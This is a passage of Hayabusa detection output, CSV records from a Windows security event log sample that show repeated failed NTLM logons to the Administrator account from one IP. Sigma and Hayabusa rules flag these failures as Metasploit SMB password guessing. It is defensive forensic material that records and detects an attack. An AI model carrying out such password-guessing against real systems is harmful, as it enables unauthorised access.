NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8VM66P8Vluf7yrL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cdYiwh3QjdA0Zoge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ou3FPUI5bFcUvuFC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMUg8N7apFtUgX9d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U7Cn4n7jQAQaxP6y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urflPvd1vgYYi2ra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pqFtTDD69fNTKROG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: teUZYpNyqJ64Dgcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9kaKSy3DV5fRKvTc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtiZUzpwrnuWIjna : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SD9UhsShNJRp251r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5xbL7aO0azgBxfz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xqrUpW8PpI9RAeGk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M80K04eYwfwdzIul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jcWY7cNeCNgJ3Czr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1OA561UrTkFnbEj3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: iDnu1G7jmwLoXGLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2v70poTOKPUNZJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhzoOmgTrdvTS27z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pyvmBFGhKFgvzM9S : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHC0keHW2YsKeP02 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29vkwuFa6njYc86s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s9687XPVHFiwttdm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AcNGaeTqTydGinJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWRu7ZC1eo1nn0IQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M52CihyrQk9MOfCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: xBKSOZwS6f9ofXu7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uT1LHJs7kyeMmTtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7FvZhetkdjnZOSpq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0DDC7WfL5T4d01yT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dUzuddZH3Stespw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LKpORcDX0ccf1xMq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4RbbKttCYPld8RR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: joni643cVcuBZH9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqY6TkW782CWKtvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d8c1I63ULh17l0rN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: cjOtMpWutC9qeSss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gmsFnerFYwXXe4Wt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzIZ4vC0E2CYq5mc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0uZe50jJH0aj9xZi : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZM5UuxLymuAMJcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iF1dq6UfuqpFpGkf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NQVTj9OLayvEg8dg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 98F9mULm7DsRUN49 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h6KjEOAdknvIMwOA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UHUu0OKm8fsHTnum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
